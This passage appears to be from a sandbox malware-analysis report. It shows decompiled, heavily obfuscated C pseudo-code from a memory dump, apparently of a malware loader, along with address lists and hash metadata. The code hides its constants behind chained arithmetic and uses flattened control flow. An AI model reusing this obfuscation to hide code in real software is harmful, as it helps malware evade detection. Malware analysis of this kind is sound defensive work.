                                                                                                                                                                                                                    				_v64 = _v64 + 0x6099;
                                                                                                                                                                                                                    				_v64 = _v64 ^ 0x0000559b;
                                                                                                                                                                                                                    				_v88 = 0xa889e0;
                                                                                                                                                                                                                    				_v88 = _v88 * 0x74;
                                                                                                                                                                                                                    				_v88 = _v88 ^ 0x01ded885;
                                                                                                                                                                                                                    				_v88 = _v88 ^ 0x4d8cade0;
                                                                                                                                                                                                                    				_v132 = 0xaf16e2;
                                                                                                                                                                                                                    				_v132 = _v132 << 0xf;
                                                                                                                                                                                                                    				_v132 = _v132 ^ 0xba668ce2;
                                                                                                                                                                                                                    				_v132 = _v132 >> 4;
                                                                                                                                                                                                                    				_v132 = _v132 ^ 0x0310f712;
                                                                                                                                                                                                                    				_v76 = 0x98727a;
                                                                                                                                                                                                                    				_v76 = _v76 / _t471;
                                                                                                                                                                                                                    				_v76 = _v76 + 0xffffecf4;
                                                                                                                                                                                                                    				_v76 = _v76 ^ 0x000102b1;
                                                                                                                                                                                                                    				_v8 = 0x258c35;
                                                                                                                                                                                                                    				_v8 = _v8 ^ 0x1fc1ce71;
                                                                                                                                                                                                                    				_v8 = _v8 ^ 0x1fefe5a7;
                                                                                                                                                                                                                    				_v32 = 0xa62314;
                                                                                                                                                                                                                    				_v32 = _v32 / _t415;
                                                                                                                                                                                                                    				_v32 = _v32 ^ 0x000107b0;
                                                                                                                                                                                                                    				_v40 = 0xfd4c00;
                                                                                                                                                                                                                    				_v40 = _v40 | 0xa97b0fba;
                                                                                                                                                                                                                    				_v40 = _v40 ^ 0xa9faa3e1;
                                                                                                                                                                                                                    				_v80 = 0xb45dcb;
                                                                                                                                                                                                                    				_v80 = _v80 * 0xf;
                                                                                                                                                                                                                    				_v80 = _v80 / _t471;
                                                                                                                                                                                                                    				_v80 = _v80 ^ 0x002d86b7;
                                                                                                                                                                                                                    				_v108 = 0x393c1c;
                                                                                                                                                                                                                    				_v108 = _v108 ^ 0xa433cf1e;
                                                                                                                                                                                                                    				_v108 = _v108 + 0xffffcb15;
                                                                                                                                                                                                                    				_v108 = _v108 ^ 0x6e775a53;
                                                                                                                                                                                                                    				_v108 = _v108 ^ 0xca72eee8;
                                                                                                                                                                                                                    				_v116 = 0xb4e06e;
                                                                                                                                                                                                                    				_v116 = _v116 + 0xe92f;
                                                                                                                                                                                                                    				_t416 = 0x45;
                                                                                                                                                                                                                    				_v116 = _v116 / _t416;
                                                                                                                                                                                                                    				_t417 = 0x5e;
                                                                                                                                                                                                                    				_v116 = _v116 / _t417;
                                                                                                                                                                                                                    				_v116 = _v116 ^ 0x000a7331;
                                                                                                                                                                                                                    				_v124 = 0xcc2302;
                                                                                                                                                                                                                    				_v124 = _v124 + 0xfffffef1;
                                                                                                                                                                                                                    				_v124 = _v124 | 0xfb956a6b;
                                                                                                                                                                                                                    				_v124 = _v124 + 0xffffb5e9;
                                                                                                                                                                                                                    				_v124 = _v124 ^ 0xfbd74e0d;
                                                                                                                                                                                                                    				_v36 = 0x336bd3;
                                                                                                                                                                                                                    				_v36 = _v36 + 0xffffa968;
                                                                                                                                                                                                                    				_v36 = _v36 ^ 0x0034028e;
                                                                                                                                                                                                                    				_v52 = 0xf50f29;
                                                                                                                                                                                                                    				_v52 = _v52 << 0xc;
                                                                                                                                                                                                                    				_v52 = _v52 + 0xffff5d52;
                                                                                                                                                                                                                    				_v52 = _v52 ^ 0x50f956bd;
                                                                                                                                                                                                                    				_v60 = 0xdbadf;
                                                                                                                                                                                                                    				_v60 = _v60 << 4;
                                                                                                                                                                                                                    				_t418 = 0x14;
                                                                                                                                                                                                                    				_v60 = _v60 / _t418;
                                                                                                                                                                                                                    				_v60 = _v60 ^ 0x0003cf31;
                                                                                                                                                                                                                    				_v28 = 0x83d675;
                                                                                                                                                                                                                    				_v28 = _v28 >> 6;
                                                                                                                                                                                                                    				_v28 = _v28 ^ 0x000e78eb;
                                                                                                                                                                                                                    				_v100 = 0x6e3324;
                                                                                                                                                                                                                    				_v100 = _v100 * 0x4a;
                                                                                                                                                                                                                    				_v100 = _v100 + 0xcbc3;
                                                                                                                                                                                                                    				_v100 = _v100 * 5;
                                                                                                                                                                                                                    				_v100 = _v100 ^ 0x9f446d9f;
                                                                                                                                                                                                                    				_v92 = 0xe87a2e;
                                                                                                                                                                                                                    				_v92 = _v92 >> 1;
                                                                                                                                                                                                                    				_v92 = _v92 + 0xffff5e36;
                                                                                                                                                                                                                    				_v92 = _v92 ^ 0xa4bb4934;
                                                                                                                                                                                                                    				_v92 = _v92 ^ 0xa4c0ff5b;
                                                                                                                                                                                                                    				_v12 = 0x3c8a2b;
                                                                                                                                                                                                                    				_v12 = _v12 << 0x10;
                                                                                                                                                                                                                    				_v12 = _v12 ^ 0x8a2aeb2c;
                                                                                                                                                                                                                    				_v20 = 0x349789;
                                                                                                                                                                                                                    				_v20 = _v20 + 0xffff32aa;
                                                                                                                                                                                                                    				_v20 = _v20 ^ 0x00310a96;
                                                                                                                                                                                                                    				_v84 = 0xa418ae;
                                                                                                                                                                                                                    				_v84 = _v84 * 0x58;
                                                                                                                                                                                                                    				_v84 = _v84 >> 7;
                                                                                                                                                                                                                    				_v84 = _v84 ^ 0x00771dbd;
                                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                                    					L1:
                                                                                                                                                                                                                    					_t386 = 0x5018e64;
                                                                                                                                                                                                                    					do {
                                                                                                                                                                                                                    						L2:
                                                                                                                                                                                                                    						if(_t469 == 0x205a397) {
                                                                                                                                                                                                                    							_push(_v96);
                                                                                                                                                                                                                    							_push(_v16);
                                                                                                                                                                                                                    							_push(_v120);
                                                                                                                                                                                                                    							__eflags = E00A7EBA2(_v140, 0, _v64, _v104, E00A81E60(0xa610d4, _v24, __eflags),  &_v4, _v88) - _v48;
                                                                                                                                                                                                                    							_t469 =  ==  ? 0x5018e64 : 0x48b82fb;
                                                                                                                                                                                                                    							E00A7D6DF(_v132, _t387, _v76, _v8);
                                                                                                                                                                                                                    							_t474 =  &(_t474[0xa]);
                                                                                                                                                                                                                    							_t386 = 0x5018e64;
                                                                                                                                                                                                                    							goto L13;
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						if(_t469 == 0x48b82fb) {
                                                                                                                                                                                                                    							_t343 =  &_v60; // 0xef4355
                                                                                                                                                                                                                    							E00A76A6B( *((intOrPtr*)( *0xa83b40 + 0x38)), _v52,  *_t343, _v28, _v100);
                                                                                                                                                                                                                    							E00A76A6B( *0xa83b40, _v92, _v12, _v20, _v84);
                                                                                                                                                                                                                    							L16:
                                                                                                                                                                                                                    							return _t405;
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						if(_t469 == _t386) {
                                                                                                                                                                                                                    							_t396 = E00A73A06(_v32,  *((intOrPtr*)( *0xa83b40 + 0x38)), _v44, _v4, _v40,  *((intOrPtr*)( *0xa83b40 + 0x3c)), _v80);
                                                                                                                                                                                                                    							_t474 =  &(_t474[5]);
                                                                                                                                                                                                                    							__eflags = _t396 - _v72;
                                                                                                                                                                                                                    							if(__eflags != 0) {
                                                                                                                                                                                                                    								_t469 = 0x48b82fb;
                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                    								_t469 = 0x792eab9;
                                                                                                                                                                                                                    								_t405 = 1;
                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                    							while(1) {
                                                                                                                                                                                                                    								L1:
                                                                                                                                                                                                                    								_t386 = 0x5018e64;
                                                                                                                                                                                                                    								goto L2;
                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						if(_t469 == 0x5f7a537) {
                                                                                                                                                                                                                    							_t399 = E00A7C6D9(0x50);
                                                                                                                                                                                                                    							 *0xa83b40 = _t399;
                                                                                                                                                                                                                    							 *((intOrPtr*)(_t399 + 0x3c)) = 0x4000;
                                                                                                                                                                                                                    							_t403 = E00A7C6D9( *((intOrPtr*)( *0xa83b40 + 0x3c)));
                                                                                                                                                                                                                    							_t467 =  *0xa83b40;
                                                                                                                                                                                                                    							_t469 = 0x205a397;
                                                                                                                                                                                                                    							 *((intOrPtr*)(_t467 + 0x38)) = _t403;
                                                                                                                                                                                                                    							 *((intOrPtr*)(_t467 + 0x24)) = _t403;
                                                                                                                                                                                                                    							 *((intOrPtr*)(_t467 + 8)) = _t403;
                                                                                                                                                                                                                    							 *((intOrPtr*)(_t467 + 0x28)) =  *((intOrPtr*)(_t467 + 0x3c)) + _t403;
                                                                                                                                                                                                                    							goto L1;
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						if(_t469 != 0x792eab9) {
                                                                                                                                                                                                                    							goto L13;
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						_t307 =  &_v68; // 0xef4355
                                                                                                                                                                                                                    						E00A62984(_v108,  *_t307, _v116, _v124, _v36, _v4);
                                                                                                                                                                                                                    						goto L16;
                                                                                                                                                                                                                    						L13:
                                                                                                                                                                                                                    						__eflags = _t469 - 0x744a52b;
                                                                                                                                                                                                                    					} while (__eflags != 0);
                                                                                                                                                                                                                    					goto L16;
                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                    			}



























































                                                                                                                                                                                                                    0x00a6a17e
                                                                                                                                                                                                                    0x00a6a184
                                                                                                                                                                                                                    0x00a6a198
                                                                                                                                                                                                                    0x00a6a19d
                                                                                                                                                                                                                    0x00a6a1a3
                                                                                                                                                                                                                    0x00a6a1ab
                                                                                                                                                                                                                    0x00a6a1ad
                                                                                                                                                                                                                    0x00a6a1b5
                                                                                                                                                                                                                    0x00a6a1ba
                                                                                                                                                                                                                    0x00a6a1c2
                                                                                                                                                                                                                    0x00a6a1ca
                                                                                                                                                                                                                    0x00a6a1d4
                                                                                                                                                                                                                    0x00a6a1d7
                                                                                                                                                                                                                    0x00a6a1db
                                                                                                                                                                                                                    0x00a6a1e3
                                                                                                                                                                                                                    0x00a6a1eb
                                                                                                                                                                                                                    0x00a6a1f3
                                                                                                                                                                                                                    0x00a6a1fb
                                                                                                                                                                                                                    0x00a6a203
                                                                                                                                                                                                                    0x00a6a20b
                                                                                                                                                                                                                    0x00a6a213
                                                                                                                                                                                                                    0x00a6a21b
                                                                                                                                                                                                                    0x00a6a223
                                                                                                                                                                                                                    0x00a6a233
                                                                                                                                                                                                                    0x00a6a23b
                                                                                                                                                                                                                    0x00a6a240
                                                                                                                                                                                                                    0x00a6a246
                                                                                                                                                                                                                    0x00a6a24e
                                                                                                                                                                                                                    0x00a6a256
                                                                                                                                                                                                                    0x00a6a25e
                                                                                                                                                                                                                    0x00a6a266
                                                                                                                                                                                                                    0x00a6a26e
                                                                                                                                                                                                                    0x00a6a276
                                                                                                                                                                                                                    0x00a6a27f
                                                                                                                                                                                                                    0x00a6a284
                                                                                                                                                                                                                    0x00a6a28e
                                                                                                                                                                                                                    0x00a6a293
                                                                                                                                                                                                                    0x00a6a299
                                                                                                                                                                                                                    0x00a6a2a1
                                                                                                                                                                                                                    0x00a6a2ae
                                                                                                                                                                                                                    0x00a6a2b1
                                                                                                                                                                                                                    0x00a6a2bd
                                                                                                                                                                                                                    0x00a6a2c1
                                                                                                                                                                                                                    0x00a6a2c6
                                                                                                                                                                                                                    0x00a6a2ce
                                                                                                                                                                                                                    0x00a6a2d6
                                                                                                                                                                                                                    0x00a6a2db
                                                                                                                                                                                                                    0x00a6a2e7
                                                                                                                                                                                                                    0x00a6a2ea
                                                                                                                                                                                                                    0x00a6a2f0
                                                                                                                                                                                                                    0x00a6a2f8
                                                                                                                                                                                                                    0x00a6a303
                                                                                                                                                                                                                    0x00a6a30e
                                                                                                                                                                                                                    0x00a6a319
                                                                                                                                                                                                                    0x00a6a321
                                                                                                                                                                                                                    0x00a6a326
                                                                                                                                                                                                                    0x00a6a32b
                                                                                                                                                                                                                    0x00a6a333
                                                                                                                                                                                                                    0x00a6a33b
                                                                                                                                                                                                                    0x00a6a34f
                                                                                                                                                                                                                    0x00a6a354
                                                                                                                                                                                                                    0x00a6a35b
                                                                                                                                                                                                                    0x00a6a366
                                                                                                                                                                                                                    0x00a6a36e
                                                                                                                                                                                                                    0x00a6a373
                                                                                                                                                                                                                    0x00a6a378
                                                                                                                                                                                                                    0x00a6a380
                                                                                                                                                                                                                    0x00a6a388
                                                                                                                                                                                                                    0x00a6a390
                                                                                                                                                                                                                    0x00a6a398
                                                                                                                                                                                                                    0x00a6a3a7
                                                                                                                                                                                                                    0x00a6a3aa
                                                                                                                                                                                                                    0x00a6a3ab
                                                                                                                                                                                                                    0x00a6a3af
                                                                                                                                                                                                                    0x00a6a3b7
                                                                                                                                                                                                                    0x00a6a3bf
                                                                                                                                                                                                                    0x00a6a3c4
                                                                                                                                                                                                                    0x00a6a3cc
                                                                                                                                                                                                                    0x00a6a3d4
                                                                                                                                                                                                                    0x00a6a3e1
                                                                                                                                                                                                                    0x00a6a3e5
                                                                                                                                                                                                                    0x00a6a3ed
                                                                                                                                                                                                                    0x00a6a3f5
                                                                                                                                                                                                                    0x00a6a3fd
                                                                                                                                                                                                                    0x00a6a402
                                                                                                                                                                                                                    0x00a6a40a
                                                                                                                                                                                                                    0x00a6a40f
                                                                                                                                                                                                                    0x00a6a417
                                                                                                                                                                                                                    0x00a6a427
                                                                                                                                                                                                                    0x00a6a42b
                                                                                                                                                                                                                    0x00a6a433
                                                                                                                                                                                                                    0x00a6a43b
                                                                                                                                                                                                                    0x00a6a446
                                                                                                                                                                                                                    0x00a6a451
                                                                                                                                                                                                                    0x00a6a45c
                                                                                                                                                                                                                    0x00a6a46c
                                                                                                                                                                                                                    0x00a6a470
                                                                                                                                                                                                                    0x00a6a478
                                                                                                                                                                                                                    0x00a6a480
                                                                                                                                                                                                                    0x00a6a488
                                                                                                                                                                                                                    0x00a6a490
                                                                                                                                                                                                                    0x00a6a49d
                                                                                                                                                                                                                    0x00a6a4a7
                                                                                                                                                                                                                    0x00a6a4ab
                                                                                                                                                                                                                    0x00a6a4b3
                                                                                                                                                                                                                    0x00a6a4bb
                                                                                                                                                                                                                    0x00a6a4c3
                                                                                                                                                                                                                    0x00a6a4cb
                                                                                                                                                                                                                    0x00a6a4d3
                                                                                                                                                                                                                    0x00a6a4db
                                                                                                                                                                                                                    0x00a6a4e3
                                                                                                                                                                                                                    0x00a6a4f3
                                                                                                                                                                                                                    0x00a6a4f8
                                                                                                                                                                                                                    0x00a6a507
                                                                                                                                                                                                                    0x00a6a50c
                                                                                                                                                                                                                    0x00a6a512
                                                                                                                                                                                                                    0x00a6a51a
                                                                                                                                                                                                                    0x00a6a522
                                                                                                                                                                                                                    0x00a6a52a
                                                                                                                                                                                                                    0x00a6a532
                                                                                                                                                                                                                    0x00a6a53a
                                                                                                                                                                                                                    0x00a6a542
                                                                                                                                                                                                                    0x00a6a54a
                                                                                                                                                                                                                    0x00a6a552
                                                                                                                                                                                                                    0x00a6a55a
                                                                                                                                                                                                                    0x00a6a562
                                                                                                                                                                                                                    0x00a6a567
                                                                                                                                                                                                                    0x00a6a56f
                                                                                                                                                                                                                    0x00a6a577
                                                                                                                                                                                                                    0x00a6a57f
                                                                                                                                                                                                                    0x00a6a588
                                                                                                                                                                                                                    0x00a6a58b
                                                                                                                                                                                                                    0x00a6a58f
                                                                                                                                                                                                                    0x00a6a597
                                                                                                                                                                                                                    0x00a6a5a2
                                                                                                                                                                                                                    0x00a6a5aa
                                                                                                                                                                                                                    0x00a6a5b5
                                                                                                                                                                                                                    0x00a6a5c2
                                                                                                                                                                                                                    0x00a6a5c6
                                                                                                                                                                                                                    0x00a6a5d3
                                                                                                                                                                                                                    0x00a6a5d7
                                                                                                                                                                                                                    0x00a6a5df
                                                                                                                                                                                                                    0x00a6a5e7
                                                                                                                                                                                                                    0x00a6a5eb
                                                                                                                                                                                                                    0x00a6a5f3
                                                                                                                                                                                                                    0x00a6a5fb
                                                                                                                                                                                                                    0x00a6a603
                                                                                                                                                                                                                    0x00a6a60e
                                                                                                                                                                                                                    0x00a6a616
                                                                                                                                                                                                                    0x00a6a621
                                                                                                                                                                                                                    0x00a6a62c
                                                                                                                                                                                                                    0x00a6a637
                                                                                                                                                                                                                    0x00a6a642
                                                                                                                                                                                                                    0x00a6a64f
                                                                                                                                                                                                                    0x00a6a653
                                                                                                                                                                                                                    0x00a6a658
                                                                                                                                                                                                                    0x00a6a660
                                                                                                                                                                                                                    0x00a6a660
                                                                                                                                                                                                                    0x00a6a660
                                                                                                                                                                                                                    0x00a6a665
                                                                                                                                                                                                                    0x00a6a665
                                                                                                                                                                                                                    0x00a6a66b
                                                                                                                                                                                                                    0x00a6a760
                                                                                                                                                                                                                    0x00a6a769
                                                                                                                                                                                                                    0x00a6a770
                                                                                                                                                                                                                    0x00a6a7b2
                                                                                                                                                                                                                    0x00a6a7c3
                                                                                                                                                                                                                    0x00a6a7c6
                                                                                                                                                                                                                    0x00a6a7cb
                                                                                                                                                                                                                    0x00a6a7ce
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6a7ce
                                                                                                                                                                                                                    0x00a6a673
                                                                                                                                                                                                                    0x00a6a7ec
                                                                                                                                                                                                                    0x00a6a7fd
                                                                                                                                                                                                                    0x00a6a81e
                                                                                                                                                                                                                    0x00a6a829
                                                                                                                                                                                                                    0x00a6a832
                                                                                                                                                                                                                    0x00a6a832
                                                                                                                                                                                                                    0x00a6a67b
                                                                                                                                                                                                                    0x00a6a73e
                                                                                                                                                                                                                    0x00a6a743
                                                                                                                                                                                                                    0x00a6a746
                                                                                                                                                                                                                    0x00a6a74a
                                                                                                                                                                                                                    0x00a6a759
                                                                                                                                                                                                                    0x00a6a74c
                                                                                                                                                                                                                    0x00a6a74e
                                                                                                                                                                                                                    0x00a6a753
                                                                                                                                                                                                                    0x00a6a753
                                                                                                                                                                                                                    0x00a6a660
                                                                                                                                                                                                                    0x00a6a660
                                                                                                                                                                                                                    0x00a6a660
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6a660
                                                                                                                                                                                                                    0x00a6a660
                                                                                                                                                                                                                    0x00a6a687
                                                                                                                                                                                                                    0x00a6a6c7
                                                                                                                                                                                                                    0x00a6a6cc
                                                                                                                                                                                                                    0x00a6a6d1
                                                                                                                                                                                                                    0x00a6a6e8
                                                                                                                                                                                                                    0x00a6a6ed
                                                                                                                                                                                                                    0x00a6a6f3
                                                                                                                                                                                                                    0x00a6a6ff
                                                                                                                                                                                                                    0x00a6a702
                                                                                                                                                                                                                    0x00a6a705
                                                                                                                                                                                                                    0x00a6a708
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6a708
                                                                                                                                                                                                                    0x00a6a68f
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6a6a8
                                                                                                                                                                                                                    0x00a6a6b0
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6a7d3
                                                                                                                                                                                                                    0x00a6a7d3
                                                                                                                                                                                                                    0x00a6a7d3
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6a7df

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.845522080.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: $3n$.z$/$1s$SZwn$UC
                                                                                                                                                                                                                    • API String ID: 0-1824664820
                                                                                                                                                                                                                    • Opcode ID: 12567c3129434c7027adf5b5ff79d474d19be116e0b60b8e18b1ef350df647b6
                                                                                                                                                                                                                    • Instruction ID: 9213b1f3c0aa0bdf23b20dc749a60c059d9d7e94629fee11cffe9da2c02cfa8f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 12567c3129434c7027adf5b5ff79d474d19be116e0b60b8e18b1ef350df647b6
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 770222725087809FD368CF25C889A0BFBF2BBD4718F508A1DF1999A260D7B1D949CF42
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    C-Code - Quality: 95%
                                                                                                                                                                                                                    			E00A756F8(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8, intOrPtr* _a12) {
                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                    				char _v12;
                                                                                                                                                                                                                    				char _v32;
                                                                                                                                                                                                                    				char _v40;
                                                                                                                                                                                                                    				signed int _v44;
                                                                                                                                                                                                                    				char _v48;
                                                                                                                                                                                                                    				signed int _v52;
                                                                                                                                                                                                                    				signed int _v56;
                                                                                                                                                                                                                    				signed int _v60;
                                                                                                                                                                                                                    				signed int _v64;
                                                                                                                                                                                                                    				signed int _v68;
                                                                                                                                                                                                                    				signed int _v72;
                                                                                                                                                                                                                    				signed int _v76;
                                                                                                                                                                                                                    				signed int _v80;
                                                                                                                                                                                                                    				unsigned int _v84;
                                                                                                                                                                                                                    				signed int _v88;
                                                                                                                                                                                                                    				signed int _v92;
                                                                                                                                                                                                                    				signed int _v96;
                                                                                                                                                                                                                    				signed int _v100;
                                                                                                                                                                                                                    				signed int _v104;
                                                                                                                                                                                                                    				signed int _v108;
                                                                                                                                                                                                                    				signed int _v112;
                                                                                                                                                                                                                    				signed int _v116;
                                                                                                                                                                                                                    				signed int _v120;
                                                                                                                                                                                                                    				signed int _v124;
                                                                                                                                                                                                                    				signed int _v128;
                                                                                                                                                                                                                    				signed int _v132;
                                                                                                                                                                                                                    				void* _t233;
                                                                                                                                                                                                                    				void* _t258;
                                                                                                                                                                                                                    				signed int _t259;
                                                                                                                                                                                                                    				char* _t261;
                                                                                                                                                                                                                    				signed int _t262;
                                                                                                                                                                                                                    				void* _t265;
                                                                                                                                                                                                                    				signed int _t268;
                                                                                                                                                                                                                    				intOrPtr _t274;
                                                                                                                                                                                                                    				intOrPtr* _t277;
                                                                                                                                                                                                                    				void* _t279;
                                                                                                                                                                                                                    				char _t283;
                                                                                                                                                                                                                    				void* _t313;
                                                                                                                                                                                                                    				intOrPtr* _t315;
                                                                                                                                                                                                                    				signed int _t316;
                                                                                                                                                                                                                    				signed int _t317;
                                                                                                                                                                                                                    				signed int _t318;
                                                                                                                                                                                                                    				signed int _t319;
                                                                                                                                                                                                                    				signed int _t320;
                                                                                                                                                                                                                    				signed int _t321;
                                                                                                                                                                                                                    				signed int _t322;
                                                                                                                                                                                                                    				void* _t324;
                                                                                                                                                                                                                    				void* _t325;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				_t277 = _a8;
                                                                                                                                                                                                                    				_t315 = _a12;
                                                                                                                                                                                                                    				_push(_t315);
                                                                                                                                                                                                                    				_push(_t277);
                                                                                                                                                                                                                    				_push(_a4);
                                                                                                                                                                                                                    				_push(__edx);
                                                                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                                                                    				E00A7C6D8(_t233);
                                                                                                                                                                                                                    				_v56 = 0xf9a79;
                                                                                                                                                                                                                    				_t325 = _t324 + 0x14;
                                                                                                                                                                                                                    				_v56 = _v56 << 0xc;
                                                                                                                                                                                                                    				_v56 = _v56 ^ 0xf9a79000;
                                                                                                                                                                                                                    				_t313 = 0;
                                                                                                                                                                                                                    				_v68 = 0x791742;
                                                                                                                                                                                                                    				_t279 = 0xa232756;
                                                                                                                                                                                                                    				_t316 = 0x3c;
                                                                                                                                                                                                                    				_v68 = _v68 * 0x48;
                                                                                                                                                                                                                    				_v68 = _v68 + 0xffff65f4;
                                                                                                                                                                                                                    				_v68 = _v68 ^ 0x220df094;
                                                                                                                                                                                                                    				_v120 = 0x53c021;
                                                                                                                                                                                                                    				_v120 = _v120 + 0xf02a;
                                                                                                                                                                                                                    				_v120 = _v120 | 0x9f615d93;
                                                                                                                                                                                                                    				_v120 = _v120 * 0x62;
                                                                                                                                                                                                                    				_v120 = _v120 ^ 0x0b2b9f0c;
                                                                                                                                                                                                                    				_v72 = 0xcc1ae5;
                                                                                                                                                                                                                    				_v72 = _v72 | 0x822baca6;
                                                                                                                                                                                                                    				_v72 = _v72 + 0xff5f;
                                                                                                                                                                                                                    				_v72 = _v72 ^ 0x82f45a96;
                                                                                                                                                                                                                    				_v52 = 0xc7e6f1;
                                                                                                                                                                                                                    				_v52 = _v52 / _t316;
                                                                                                                                                                                                                    				_v52 = _v52 ^ 0x0002a630;
                                                                                                                                                                                                                    				_v112 = 0xecffd5;
                                                                                                                                                                                                                    				_v112 = _v112 >> 3;
                                                                                                                                                                                                                    				_v112 = _v112 << 0xc;
                                                                                                                                                                                                                    				_v112 = _v112 | 0x706367ae;
                                                                                                                                                                                                                    				_v112 = _v112 ^ 0xf9f2840b;
                                                                                                                                                                                                                    				_v128 = 0x131b4e;
                                                                                                                                                                                                                    				_t317 = 0x4e;
                                                                                                                                                                                                                    				_v128 = _v128 * 0x68;
                                                                                                                                                                                                                    				_v128 = _v128 * 0x36;
                                                                                                                                                                                                                    				_v128 = _v128 + 0xdcf1;
                                                                                                                                                                                                                    				_v128 = _v128 ^ 0xa32de10b;
                                                                                                                                                                                                                    				_v64 = 0xec5bc7;
                                                                                                                                                                                                                    				_v64 = _v64 + 0x18d6;
                                                                                                                                                                                                                    				_v64 = _v64 ^ 0x00e65f2f;
                                                                                                                                                                                                                    				_v80 = 0x5c3963;
                                                                                                                                                                                                                    				_v80 = _v80 >> 0xb;
                                                                                                                                                                                                                    				_v80 = _v80 + 0xffffa1e0;
                                                                                                                                                                                                                    				_v80 = _v80 ^ 0xfff6998c;
                                                                                                                                                                                                                    				_v104 = 0xfba1ee;
                                                                                                                                                                                                                    				_v104 = _v104 + 0xe3d9;
                                                                                                                                                                                                                    				_v104 = _v104 / _t317;
                                                                                                                                                                                                                    				_v104 = _v104 + 0xffff56a4;
                                                                                                                                                                                                                    				_v104 = _v104 ^ 0x00071a36;
                                                                                                                                                                                                                    				_v96 = 0x6bdf80;
                                                                                                                                                                                                                    				_t318 = 0x27;
                                                                                                                                                                                                                    				_v96 = _v96 / _t318;
                                                                                                                                                                                                                    				_v96 = _v96 | 0xe5549ed6;
                                                                                                                                                                                                                    				_v96 = _v96 ^ 0xe5563748;
                                                                                                                                                                                                                    				_v84 = 0xb7dea7;
                                                                                                                                                                                                                    				_v84 = _v84 | 0xdc0832e2;
                                                                                                                                                                                                                    				_v84 = _v84 >> 0x10;
                                                                                                                                                                                                                    				_v84 = _v84 ^ 0x0007093b;
                                                                                                                                                                                                                    				_v88 = 0x852327;
                                                                                                                                                                                                                    				_v88 = _v88 ^ 0x10be1b97;
                                                                                                                                                                                                                    				_v88 = _v88 ^ 0xaf77d093;
                                                                                                                                                                                                                    				_v88 = _v88 ^ 0xbf4c6dbf;
                                                                                                                                                                                                                    				_v124 = 0x285e5e;
                                                                                                                                                                                                                    				_v124 = _v124 + 0xffff7273;
                                                                                                                                                                                                                    				_t319 = 0x3e;
                                                                                                                                                                                                                    				_v124 = _v124 * 0x21;
                                                                                                                                                                                                                    				_v124 = _v124 ^ 0x56eda1fe;
                                                                                                                                                                                                                    				_v124 = _v124 ^ 0x53c3f397;
                                                                                                                                                                                                                    				_v76 = 0xf7725c;
                                                                                                                                                                                                                    				_v76 = _v76 + 0x9b8f;
                                                                                                                                                                                                                    				_v76 = _v76 / _t319;
                                                                                                                                                                                                                    				_v76 = _v76 ^ 0x000a8640;
                                                                                                                                                                                                                    				_v132 = 0x7a3907;
                                                                                                                                                                                                                    				_v132 = _v132 ^ 0x8b3ff038;
                                                                                                                                                                                                                    				_v132 = _v132 >> 0xa;
                                                                                                                                                                                                                    				_v132 = _v132 << 0x10;
                                                                                                                                                                                                                    				_v132 = _v132 ^ 0xd176224d;
                                                                                                                                                                                                                    				_v60 = 0x2fb437;
                                                                                                                                                                                                                    				_v60 = _v60 ^ 0x56548732;
                                                                                                                                                                                                                    				_v60 = _v60 ^ 0x567e12a9;
                                                                                                                                                                                                                    				_v92 = 0xce3b9c;
                                                                                                                                                                                                                    				_t320 = 0xe;
                                                                                                                                                                                                                    				_v92 = _v92 * 0x6a;
                                                                                                                                                                                                                    				_v92 = _v92 << 3;
                                                                                                                                                                                                                    				_v92 = _v92 ^ 0xab213493;
                                                                                                                                                                                                                    				_v100 = 0x918fd3;
                                                                                                                                                                                                                    				_v100 = _v100 / _t320;
                                                                                                                                                                                                                    				_v100 = _v100 + 0xfffff41e;
                                                                                                                                                                                                                    				_v100 = _v100 ^ 0xe1564f8c;
                                                                                                                                                                                                                    				_v100 = _v100 ^ 0xe15a45cd;
                                                                                                                                                                                                                    				_v108 = 0x5a9e54;
                                                                                                                                                                                                                    				_v108 = _v108 + 0x8714;
                                                                                                                                                                                                                    				_t321 = 0x3f;
                                                                                                                                                                                                                    				_v108 = _v108 * 0x1d;
                                                                                                                                                                                                                    				_v108 = _v108 + 0xffff0bdd;
                                                                                                                                                                                                                    				_v108 = _v108 ^ 0x0a50a8e2;
                                                                                                                                                                                                                    				_v116 = 0xdf1b79;
                                                                                                                                                                                                                    				_v116 = _v116 * 0x5f;
                                                                                                                                                                                                                    				_v116 = _v116 / _t321;
                                                                                                                                                                                                                    				_t322 = 0x65;
                                                                                                                                                                                                                    				_v116 = _v116 / _t322;
                                                                                                                                                                                                                    				_v116 = _v116 ^ 0x0009a524;
                                                                                                                                                                                                                    				while(_t279 != 0x6e9fd35) {
                                                                                                                                                                                                                    					if(_t279 == 0x9541785) {
                                                                                                                                                                                                                    						_t259 =  *((intOrPtr*)(_t277 + 4));
                                                                                                                                                                                                                    						_t283 =  *_t277;
                                                                                                                                                                                                                    						_v44 = _t259;
                                                                                                                                                                                                                    						_v48 = _t283;
